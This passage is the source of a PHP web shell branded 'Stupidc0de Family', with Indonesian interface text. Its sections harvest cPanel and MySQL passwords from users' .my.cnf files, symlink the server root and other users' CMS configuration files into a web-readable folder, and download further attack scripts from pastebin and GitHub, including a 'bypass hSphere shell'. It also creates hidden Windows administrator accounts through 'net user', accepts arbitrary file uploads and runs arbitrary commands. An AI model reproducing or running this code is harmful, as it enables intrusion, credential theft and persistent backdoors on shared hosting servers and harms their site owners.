  1187. echo"<br><br>
  1188. <center><b>
  1189. <font face='Jolly Lodger' color='white' size='6px'> [+] Stupidc<font color='teal'>0</font>de Family [+]</font><br>
  1190. <br>
  1191. <font face='Fredericka The Great' color='white' size='3px'>&hearts; Respect Us, Little Crazy Family From Indonesia ^_^ &hearts;<br><br>
  1192. -:- No Leader We Just Laugh Together -:-</font><br><br>
  1193. <font color='gray'> http://www.stupidc0de.family/ </font><br><br><br>
  1194. </center>
  1195. </b>";
  1196. break;
  1197. }
  1198.  
  1199.  
  1200. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpanel'))
  1201. {
  1202. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>";
  1203. ?>
  1204.  
  1205. <a href="?<?php echo "path=".$path; ?>&amp;x=brute"><input class=bordergaya type=submit value="Cpanel Bruteforce" /></a>
  1206. Or <a href="?<?php echo "path=".$path; ?>&amp;x=cpcrack"><input class=bordergaya type=submit value="Auto Cpanel Finder/Cracker" /></a>
  1207. <br/><br/><br/><br/>
  1208. <?php break; ?>
  1209.  
  1210. <?php
  1211. }
  1212. elseif(isset($_GET['x']) && ($_GET['x'] == 'cpcrack'))
  1213. {
  1214. ?>
  1215. <form action="?path=<?php echo $path; ?>&amp;x=cpcrack" method="post">
  1216. <?php
  1217.  
  1218. @ini_set('display_errors',0);
  1219. function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){
  1220. $ar0=explode($marqueurDebutLien, $text);
  1221. $ar1=explode($marqueurFinLien, $ar0[$i]);
  1222. return trim($ar1[0]);
  1223. }
  1224.  
  1225. echo '<h1>Cpanel Finder/Cracker</h1><br/>';
  1226.  
  1227. echo "<center>";
  1228. $d0mains = @file('/etc/named.conf');
  1229. $domains = scandir("/var/named");
  1230.  
  1231. if ($domains or $d0mains)
  1232. {
  1233. $domains = scandir("/var/named");
  1234. if($domains) {
  1235. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1236. $count=1;
  1237. $dc = 0;
  1238. $list = scandir("/var/named");
  1239. foreach($list as $domain){
  1240. if(strpos($domain,".db")){
  1241. $domain = str_replace('.db','',$domain);
  1242. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1243. $dirz = '/home/'.$owner['name'].'/.my.cnf';
  1244. $path = getcwd();
  1245.  
  1246. if (is_readable($dirz)) {
  1247. copy($dirz, ''.$path.'/'.$owner['name'].'.txt');
  1248. $p=file_get_contents(''.$path.'/'.$owner['name'].'.txt');
  1249. $password=entre2v2($p,'password="','"');
  1250. echo "<tr><td>".$count++."</td><td><a href='http://".$domain.":2082' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td><td><a href='".$owner['name'].".txt' target='_blank'>Click Here</a></td></tr>";
  1251. $dc++;
  1252. }
  1253.  
  1254. }
  1255. }
  1256. echo '</table>';
  1257. $total = $dc;
  1258. echo '<br><div class="result">Total cPanel Found = '.$total.'</h3><br />';
  1259. echo '</center>';
  1260. }else{
  1261. $d0mains = @file('/etc/named.conf');
  1262. if($d0mains) {
  1263. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th><th> Password </th><th> .my.cnf </th></tr>";
  1264. $count=1;
  1265. $dc = 0;
  1266. $mck = array();
  1267. foreach($d0mains as $d0main){
  1268. if(@eregi('zone',$d0main)){
  1269. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  1270. flush();
  1271. if(strlen(trim($domain[1][0])) >2){
  1272. $mck[] = $domain[1][0];
  1273. }
  1274. }
  1275. }
  1276. $mck = array_unique($mck);
  1277. $usr = array();
  1278. $dmn = array();
  1279. foreach($mck as $o) {
  1280. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  1281. $usr[] = $infos['name'];
  1282. $dmn[] = $o;
  1283. }
  1284. array_multisort($usr,$dmn);
  1285. $dt = file('/etc/passwd');
  1286. $passwd = array();
  1287. foreach($dt as $d) {
  1288. $r = explode(':',$d);
  1289. if(strpos($r[5],'home')) {
  1290. $passwd[$r[0]] = $r[5];
  1291. }
  1292. }
  1293. $l=0;
  1294. $j=1;
  1295. foreach($usr as $r) {
  1296. $dirz = '/home/'.$r.'/.my.cnf';
  1297. $path = getcwd();
  1298. if (is_readable($dirz)) {
  1299. copy($dirz, ''.$path.'/'.$r.'.txt');
  1300. $p=file_get_contents(''.$path.'/'.$r.'.txt');
  1301. $password=entre2v2($p,'password="','"');
  1302. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td><a href='".$r.".txt' target='_blank'>Click Here</a></td></tr>";
  1303. $dc++;
  1304. flush();
  1305. $l=$l?0:1;
  1306. $j++;
  1307. }
  1308. }
  1309. }
  1310. echo '</table>';
  1311. $total = $dc;
  1312. echo '<br><h3>Total cPanel Found = '.$total.'</h3><br />';
  1313. echo '</center>';
  1314.  
  1315. }
  1316. }else{
  1317. echo "<h3><i><font color='red'>ERROR</font><br><font color='red'>/var/named</font> or <font color='red'>etc/named.conf</font> Not Accessible!</i></h3>";
  1318. }
  1319.  
  1320. echo "</body></html>";
  1321. break;
  1322. }
  1323.  
  1324. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  1325. ///////////////////////////////////////////////////////////////////////////////////////////////////////////////////////END OF CPANEL TOOLS//////////////////////////////
  1326. ////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////
  1327.  
  1328.  
  1329. elseif(isset($_GET['x']) && ($_GET['x'] == 'vn'))
  1330. {
  1331. ?>
  1332. <form action="?path=<?php echo $path; ?>&amp;x=vn" method="post">
  1333. <center><h2>Domain Viewer</h2></center><br><br>
  1334. <?php
  1335. function openBaseDir()
  1336. {
  1337. $openBaseDir = ini_get("open_basedir");
  1338. if (!$openBaseDir)
  1339. {
  1340. $openBaseDir = '<font color="green">OFF</font>';
  1341. }
  1342. else
  1343. {
  1344. $openBaseDir = '<font color="red">ON</font>';
  1345. }
  1346. return $openBaseDir;
  1347. }
  1348.  
  1349.  
  1350. echo '
  1351. <table width="95%" cellspacing="0" cellpadding="0" >
  1352. <td height="100" align="left" >';
  1353. $pg = basename(__FILE__);
  1354. $safe_mode = @ini_get('safe_mode');
  1355. $dir = @getcwd();
  1356. ////////////////////////////////////////////////////
  1357. #.htaccess
  1358. @mkdir('pee',0777);
  1359. @symlink("/","pee/root");
  1360. $htaccss = "Options all
  1361. DirectoryIndex Sux.html
  1362. AddType text/plain .php
  1363. AddHandler server-parsed .php
  1364. AddType text/plain .html
  1365. AddHandler txt .html
  1366. Require None
  1367. Satisfy Any";
  1368.  
  1369. file_put_contents("pee/.htaccess",$htaccss);
  1370. $etc = file_get_contents("/etc/passwd");
  1371. $etcz = explode("\n",$etc);
  1372.  
  1373.  
  1374. ##Symlink to the ROOT :p
  1375. foreach($etcz as $etz){
  1376. $etcc = explode(":",$etz);
  1377. error_reporting(0);
  1378.  
  1379. $current_dir = posix_getcwd();
  1380. $dir = explode("/",$current_dir);
  1381.  
  1382. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
  1383. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/blog/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
  1384. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/wp/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
  1385. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/wp-config.php',"pee/".$etcc[0].'-WordPress.txt');
  1386. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/config.php',"pee/".$etcc[0].'-PhpBB.txt');
  1387. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/config.php',"pee/".$etcc[0].'-vBulletin.txt');
  1388. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
  1389. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/web/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
  1390. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/joomla/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
  1391. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/site/configuration.php',"pee/".$etcc[0].'-Joomla.txt');
  1392. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/conf_global.php',"pee/".$etcc[0].'-IPB.txt');
  1393. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/inc/config.php',"pee/".$etcc[0].'-MyBB.txt');
  1394. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/Settings.php',"pee/".$etcc[0].'-SMF.txt');
  1395. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/sites/default/settings.php',"pee/".$etcc[0].'-Drupal.txt');
  1396. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/e107_config.php',"pee/".$etcc[0].'-e107.txt');
  1397. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/datas/config.php',"pee/".$etcc[0].'-Seditio.txt');
  1398. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/includes/configure.php',"pee/".$etcc[0].'-osCommerce.txt');
  1399. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/client/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1400. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1401. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/support/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1402. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/supportes/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1403. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmcs/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1404. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domain/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1405. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/hosting/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1406. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/whmc/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1407. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/billing/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1408. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/portal/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1409. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/order/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1410. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/clientarea/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1411. symlink('/'.$dir[1].'/'.$etcc[0].'/'.$dir[3].'/domains/configuration.php',"pee/".$etcc[0].'-WHMCS.txt');
  1412. }
  1413. #############################
  1414. if(is_readable("/var/named")){
  1415. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
  1416. echo'<tr><td><center><b>SITE</b></center></td><td>
  1417. <center><b>USER</b></center></td>
  1418. <td></center><b>SYMLINK</b></center></td>';
  1419. $list = scandir("/var/named");
  1420. foreach($list as $domain){
  1421. if(strpos($domain,".db")){
  1422. $i += 1;
  1423. $domain = str_replace('.db','',$domain);
  1424. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1425.  
  1426. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
  1427. <td class='td1'><center><font color='red'>".$owner['name']."</font></center></td>
  1428. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  1429. }
  1430. }
  1431. echo "<center>Total Domains Found: ".$i."</center><br />";
  1432. }else{
  1433. echo "<tr><td class='td1'>can't read [ /var/named ]</td><tr>"; }
  1434.  
  1435. break;
  1436.  
  1437. ##################################
  1438. error_reporting(0);
  1439. $etc = file_get_contents("/etc/passwd");
  1440. $etcz = explode("\n",$etc);
  1441. if(is_readable("/etc/passwd")){
  1442.  
  1443. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
  1444. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td><center><b>SYMLINK</b></center></td>';
  1445.  
  1446. $list = scandir("/var/named");
  1447.  
  1448. foreach($etcz as $etz){
  1449. $etcc = explode(":",$etz);
  1450.  
  1451. foreach($list as $domain){
  1452. if(strpos($domain,".db")){
  1453. $domain = str_replace('.db','',$domain);
  1454. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1455. if($owner['name'] == $etcc[0])
  1456. {
  1457. $i += 1;
  1458. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><center>
  1459. <td class='td1'><font color='red'>".$owner['name']."</font></center></td>
  1460. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  1461. }}}}
  1462. echo "<center>Total Domains Found: ".$i."</center><br />";}
  1463.  
  1464. break;
  1465. ###############################
  1466. if(is_readable("/etc/named.conf")){
  1467. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
  1468. echo'<tr><td><center><b>SITE</b></center></td><td><center><b>USER</b></center></td><td></center><b>SYMLINK</b></center></td>';
  1469. $named = file_get_contents("/etc/named.conf");
  1470. preg_match_all('%zone \"(.*)\" {%',$named,$domains);
  1471. foreach($domains[1] as $domain){
  1472. $domain = trim($domain);
  1473. $i += 1;
  1474. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1475. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td><td class='td1'><center><font color='red'>".$owner['name']."</font></center></td><td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  1476. }
  1477. echo "<center>Total Domains Found: ".$i."</center><br />";
  1478.  
  1479. } else { echo "<tr><td class='td1'>can't read [ /etc/named.conf ]</td></tr>"; }
  1480.  
  1481. break;
  1482. ############################
  1483. if(is_readable("/etc/valiases")){
  1484. echo'<table align="center" border="1" width="45%" cellspacing="0" cellpadding="4" >';
  1485. echo'<tr><td><center><b>SITE</b></center></td><td>
  1486. <center><b>USER</b></center></td><td></center>
  1487. <b>SYMLINK</b></center></td>';
  1488. $list = scandir("/etc/valiases");
  1489. foreach($list as $domain){
  1490. $i += 1;
  1491. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  1492. echo "<tr><td class='td1'><a href='http://".$domain." '>".$domain."</a></td>
  1493. <center><td class='td1'><font color='red'>".$owner['name']."</font></center></td>
  1494. <td class='td1'><center><a href='pee/root".$owner['dir']."/".$dir[3]."' target='_blank'>DIR</a></center></td>";
  1495. }
  1496. echo "<center>Total Domains Found: ".$i."</center><br />";
  1497. } else { echo "<tr><td class='td1'>can't read [ /etc/valiases ]</td></tr>"; }
  1498.  
  1499. break;
  1500. }
  1501.  
  1502. ///DUMP
  1503. elseif(isset($_GET['x']) && ($_GET['x'] == 'dump'))
  1504. {
  1505. ?>
  1506. <br/><br/>
  1507. <form action="?path=<?php echo $path; ?>&amp;x=dump" method="post">
  1508. <?php
  1509. $pilih = $_POST['pilihan'];
  1510. echo'<center>
  1511. <table border=1>
  1512. <select class="bordergaya" align="left" name="pilihan" id="pilih">
  1513. <option value="dumper">Gate 1</option>
  1514. </select>
  1515. <input type="submit" name="submites" class="bordergaya" value="Click here for Dump Email">';?><?php
  1516. if ( $pilih == "dumper") {
  1517. $files = file_get_contents("http://pastebin.com/raw/HhiURUER");
  1518. file_put_contents("dumper.php",$files);
  1519. echo "<script>alert('Done! Access dumper.php for processing'); hideAll();</script>";
  1520. echo "<a href=".'dumper.php'." target=_blank><br/><br/><b>dumper.php [Click here]</b></a></center>";
  1521. die();
  1522. }
  1523. echo'</td></form></tr></table>';
  1524. break;
  1525. }
  1526.  
  1527. ///menu rdp
  1528. if(isset($_GET['x']) && ($_GET['x'] == 'krdp'))
  1529. /* By Shor7cut */
  1530. /* Interface By Putra-Attacker*/
  1531. {
  1532. if(strtoupper(substr(PHP_OS, 0, 3)) === 'WIN')
  1533. {
  1534. ?><br/><br/>
  1535. <div id="content-left">
  1536. <form action="" method="post">
  1537. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
  1538. <tr>
  1539. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">CREATE RDP</font></td>
  1540. </tr>
  1541. <tr>
  1542. <td><font class='kecew'>Username</font></td>
  1543. <td><font class='kecew'> : </font></td>
  1544. <td><input type="text" class="bordergaya" name="username" required></td>
  1545. </tr>
  1546. <tr>
  1547. <td><font class='kecew'>Password</font></td>
  1548. <td><font class='kecew'> : </font></td>
  1549. <td><input type="text" class="bordergaya" name="password" required></td>
  1550. </tr>
  1551. <tr>
  1552. <td colspan="3" align="center"><input type="hidden" name="kshell" value="1"><input type="submit" name="submit" class="bordergaya" value="Create"></td>
  1553. </tr>
  1554. </table>
  1555. </form>
  1556. </div>
  1557. <br/>
  1558. <div id="content-left">
  1559. <form action="" method="post">
  1560. <table border="1px" bordercolor="#2d2b2b" cellpadding="5px">
  1561. <tr>
  1562. <td colspan="3" align="center" bgcolor="#2d2b2b"><font face="Fredericka the Great" size="2px" color="white">OPTION</td>
  1563. </tr>
  1564. <tr>
  1565. <td><font class='kecew'>Username</font></td>
  1566. <td><font class='kecew'> : </font></td>
  1567. <td><input type="text" name="rusername" placeholder="Masukan Username" class="bordergaya"></td>
  1568. </tr>
  1569. <tr>
  1570. <td><font class='kecew'>Password</font></td>
  1571. <td><font class='kecew'> : </font></td>
  1572. <td><input type="text" name="gantipw" placeholder="Password Baru" class="bordergaya"></td>
  1573. </tr>
  1574. <tr>
  1575. <td><font class='kecew'>Action</font></td>
  1576. <td><font class='kecew'> : </font></td>
  1577. <td>
  1578. <select name="aksi" class="bordergaya">
  1579. <option value="1">Tampilkan Username</option>
  1580. <option value="2">Hapus Username</option>
  1581. <option value="3">Ubah Password</option>
  1582. </select>
  1583. </td>
  1584. </tr>
  1585. <tr>
  1586. <td colspan="3" align="center"><input type="hidden" name="kshell" value="2"><input type="submit" name="submit" class="bordergaya" value="Execute"></td>
  1587. </tr>
  1588. </table>
  1589. </form>
  1590. <br/>
  1591. </div>
  1592. </center></center>
  1593. <?php
  1594. if($_POST['submit'])
  1595. {
  1596. if($_POST['kshell']=="1")
  1597. {
  1598. $r_user = $_POST['username'];
  1599. $r_pass = $_POST['password'];
  1600. $cmd_cek_user = shell_exec("net user");
  1601. if(preg_match("/$r_user/", $cmd_cek_user)){
  1602. echo $gaya_root.$r_user." sudah ada".$o;
  1603. }else {
  1604. $cmd_add_user = shell_exec("net user ".$r_user." ".$r_pass." /add");
  1605. $cmd_add_groups1 = shell_exec("net localgroup Administrators ".$r_user." /add");
  1606. $cmd_add_groups2 = shell_exec("net localgroup Administrator ".$r_user." /add");
  1607. $cmd_add_groups3 = shell_exec("net localgroup Administrateur ".$r_user." /add");
  1608. if($cmd_add_user){
  1609. echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='greenyellow'>Berhasil!</font></font><br/><br/>".$o;
  1610. }else {
  1611. echo $gaya_root."<font class='rapihbanget'>[+] Menambahkan User : ".$r_user." Password : ".$r_pass." <font color='red'>Gagal!</font><br/><br/>".$o;
  1612. }
  1613. echo "<font class='rapihbanget'>[+] Sedang Memroses User.. Silahkan Tunggu Sebentar.. <br/>";
  1614. if($cmd_add_groups1){
  1615. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
  1616. }else
  1617. if($cmd_add_groups2){
  1618. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
  1619. }else
  1620. if($cmd_add_groups3){
  1621. echo $gaya_root."<font class='rapihbanget'>--- Selamat! User ".$r_user." <font color='greenyellow'>Berhasil Di Proses!</font><br/><br/>".$o;
  1622. }else {
  1623. echo $gaya_root."<font class='rapihbanget'>--- Maaf User ".$r_user." <font color='red'>Gagal Di Proses!</font><br/><br/>".$o;
  1624. }
  1625. echo "<font class='rapihbanget'>[+] Server Info : </font><br/>";
  1626. echo $gaya_root."<font class='rapihbanget'>--- ServerIP : ".$_SERVER["HTTP_HOST"]."</font><br/><font class='rapihbanget'>--- Username : ".$r_user."</font><br/><font class='rapihbanget'>--- Password : </font>".$r_pass.$o."</font><br/><br/>";
  1627. echo "<font class='rapihbanget'>[+] Thank For Using It ~_^ </font><br/><br/>";
  1628. }
  1629.  
  1630.  
  1631. }
  1632. else if($_POST['kshell']=="2")
  1633. {
  1634. echo "<style>
  1635. .coeg{margin-left:30%;}
  1636. </style>";
  1637. if($_POST['aksi']=="1"){
  1638. echo "<pre class='coeg'>".shell_exec("net user");
  1639. }
  1640. else if($_POST['aksi']=="2")
  1641. {
  1642. $username = $_POST['rusername'];
  1643. $cmd_cek_user = shell_exec("net user");
  1644. if (!empty($username)){
  1645. if(preg_match("/$username/", $cmd_cek_user)){
  1646. $cmd_add_user = shell_exec("net user ".$username." /DELETE");
  1647. if($cmd_add_user){
  1648. echo "<font class='rapihbanget'>[+] Sedang Memroses.. Silahkan Tunggu.. </font><br /><br />";
  1649. echo $gaya_root."<font class='rapihbanget'>[+] Selamat! Remove User </font><font color='orange'>".$username." </font><font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
  1650. }else {
  1651. echo $gaya_root."<font class='rapihbanget'>[+] Yah :( Remove User </font><font color='orange'>".$username." </font><font color='red'>Gagal!!</font><br /><br />".$o;
  1652. }
  1653. }else {
  1654. echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
  1655. }
  1656. }else {
  1657. echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
  1658. }
  1659. }
  1660. else if($_POST['aksi']=="3")
  1661. {
  1662. echo "<style>
  1663. .tengahaja{margin-left:35%}
  1664. </style>";
  1665. $username = $_POST['rusername'];
  1666. $password = $_POST['gantipw'];
  1667. $cmd_cek_user = shell_exec("net user");
  1668. if (!empty($username)){
  1669. if(preg_match("/$username/", $cmd_cek_user)){
  1670. $cmd_add_user = shell_exec("net user ".$username."");
  1671. if($cmd_add_user){
  1672. echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='greenyellow'>Berhasil!!</font><br /><br />".$o;
  1673. }else {
  1674. echo $gaya_root."<font class='tengahaja'>Ganti Password Username : ".$username." dan Password : ".$password." <font color='red'>Gagal!!</font><br /><br />".$o;
  1675. }
  1676. }else
  1677. {
  1678. echo $gaya_root."<font class='rapihbanget'>Are You Kidding Me?! Username : </font><font color='orange'>" .$username. " </font><font color='red'> Itu Enggak Ada!!</font><br /><br />".$o;
  1679. }
  1680. }else
  1681. {
  1682. echo $gaya_root."<font class='rapihbanget'> Silahkan Masukkan Dahulu Username Yang Mau Di Hapus!! </font><br /><br />".$o;
  1683. }
  1684. }
  1685. }
  1686.  
  1687. }
  1688. } else{
  1689. echo "<br><br><font color='springgreen' face='Fredericka The Great'>TOOLS GAK BISA DI PAKE NDAN -_- SERVERNYA BUKAN WINDOWS</font>";
  1690. }break;
  1691. }
  1692.  
  1693. /*
  1694. AUTO UPLOAD
  1695. START HERE
  1696. */
  1697.  
  1698. elseif(isset($_GET['x']) && ($_GET['x'] == 'fcrot'))
  1699. {
  1700. echo'<center><br><br><h3>File Creator [Auto upload]</h3>
  1701. <table>
  1702. <tr><form method="post" action="">&nbsp;<td>
  1703. <select class="bordergaya" align="left" name="pilihan" id="pilih">
  1704. <option value="hsphere">Bypass hSphere Shell</option>
  1705. <option value="adminer">Adminer</option>
  1706. </select>
  1707. <input type="submit" name="submites" class="bordergaya" value="create">
  1708. </td></form></tr></table>';
  1709. error_reporting(0);
  1710. set_time_limit(0);
  1711. $submit = $_POST ['submites'];
  1712. if(isset($submit)) {
  1713. $pilih = $_POST['pilihan'];
  1714. ///hsphere shell
  1715. if ( $pilih == 'hsphere') {
  1716. $files = file_get_contents("https://raw.githubusercontent.com/sinkaroid/pasirmerah/sc0/sc0hsphere.php");
  1717. file_put_contents("hsphere.php",$files);
  1718. echo "<script>alert('Bypass hsphere shell created!'); hideAll();</script>";
  1719. echo "<a href="."hsphere.php"." target=_blank><b>hsphere.php [Click here]</b></a></center>";
  1720. die();
  1721. }
  1722.  
  1723. elseif ( $pilih == 'adminer') {
  1724. getfile("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php");
  1725. echo "<script>alert('adminer created!'); hideAll();</script>";
  1726. echo "<a href="."adminer.php"." target=_blank><b>adminer.php [Click here]</b></a></center>";
  1727. die();
  1728. }
  1729.  
  1730. }break;
  1731. }
  1732.  
  1733.  
  1734. elseif(isset($_GET['x']) && ($_GET['x'] == 'korong'))
  1735. {
  1736. echo '<center><br /><br />
  1737. <form enctype="multipart/form-data" method="POST">
  1738. <input type="file" name="file" id="file" class="inputfile inputfile-4" />
  1739. <label for="file">
  1740. <figure>
  1741. <svg xmlns="http://www.w3.org/2000/svg" width="20" height="17" viewBox="0 0 20 17"><path d="M10 0l-5.2 4.9h3.3v5.1h3.8v-5.1h3.3l-5.2-4.9zm9.3 11.5l-3.2-2.1h-2l3.4 2.6h-3.5c-.1 0-.2.1-.2.1l-.8 2.3h-6l-.8-2.2c-.1-.1-.1-.2-.2-.2h-3.6l3.4-2.6h-2l-3.2 2.1c-.4.3-.7 1-.6 1.5l.6 3.1c.1.5.7.9 1.2.9h16.3c.6 0 1.1-.4 1.3-.9l.6-3.1c.1-.5-.2-1.2-.7-1.5z"/></svg>
  1742. </figure>
  1743. <span>Silahkan Pilih File</span>
  1744. </label>';
  1745. ?>
  1746. <script type="text/javascript">
  1747. /*
  1748. By Osvaldas Valutis, www.osvaldas.info
  1749. Available for use under the MIT License
  1750. */
  1751.  
  1752. 'use strict';
  1753.  
  1754. ;( function ( document, window, index )
  1755. {
  1756. var inputs = document.querySelectorAll( '.inputfile' );
  1757. Array.prototype.forEach.call( inputs, function( input )
  1758. {
  1759. var label = input.nextElementSibling,
  1760. labelVal = label.innerHTML;
  1761.  
  1762. input.addEventListener( 'change', function( e )
  1763. {
  1764. var fileName = '';
  1765. if( this.files && this.files.length > 1 )
  1766. fileName = ( this.getAttribute( 'data-multiple-caption' ) || '' ).replace( '{count}', this.files.length );
  1767. else
  1768. fileName = e.target.value.split( '\\' ).pop();
  1769.  
  1770. if( fileName )
  1771. label.querySelector( 'span' ).innerHTML = fileName;
  1772. else
  1773. label.innerHTML = labelVal;
  1774. });
  1775.  
  1776. // Firefox bug fix
  1777. input.addEventListener( 'focus', function(){ input.classList.add( 'has-focus' ); });
  1778. input.addEventListener( 'blur', function(){ input.classList.remove( 'has-focus' ); });
  1779. });
  1780. }( document, window, 0 ));
  1781. </script>
  1782. <?php
  1783. echo'<br/>
  1784. <input type="submit" class="tombolupil" value="Upload File!" />
  1785. </form>';
  1786. if(isset($_FILES['file'])){
  1787. if(copy($_FILES['file']['tmp_name'],$path.'/'.$_FILES['file']['name'])){
  1788. echo '<script>alert("File Sukses Di Upload!");</script>';
  1789. }else{
  1790. echo '<script>alert("File Gagal Di Upload!");</script>';
  1791. }
  1792. }
  1793. echo "</center><br /><br />";
  1794. break;
  1795. }
  1796.  
  1797. ///////////////////////////
  1798.  
  1799. ////////////////////////CMD////////////////////////
  1800.  
  1801. elseif(isset($_GET['x']) && ($_GET['x'] == 'cmd')) {
  1802. echo "<br/><br/><form method='post'>
  1803. <font clss='rapihbanget'>Command :</font>
  1804. <input class='bordergaya' type='text' size='30' height='10' name='cmd'><input type='submit' class='bordergaya' name='execmd' value=' Execute '>
  1805. </form>";
  1806. if($_POST['execmd']) {
  1807. echo "<pre>".exe($_POST['cmd'])."</pre>";
  1808. }
  1809. }
  1810.  
  1811. ///////////////////////////////////////////////////
  1812.  
  1813. //////////////////////////////////////////////////
  1814. //////////////////////////////////////////////////
  1815. elseif(isset($_GET['x']) && ($_GET['x'] == 'bypstuls'))
  1816. {
  1817. echo "<br/><br/>Monggo Pilih Toolsnya Bos Q ~_^<br/><br/>"; ?>
  1818. <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwsf"><input class=bordergaya type=submit value="Bypass Root Path With System Function" /></a>
  1819. Or <a href="?<?php echo "path=".$path; ?>&amp;x=bypsini"><input class=bordergaya type=submit value="Bypass Disable Functions" /></a>
  1820. Or <a href="?<?php echo "path=".$path; ?>&amp;x=bysysfuncwexec"><input class=bordergaya type=submit value="Bypass Root Path With Exec Function" /></a>
  1821. <br/><br/><br/><br/>
  1822. <?php
  1823. }
  1824. //////////////////////////////////////////////////
  1825. //////////////////////////////////////////////////
  1826.  
  1827. ////////////////////////////////////////
  1828. ///////////////////////////////////////
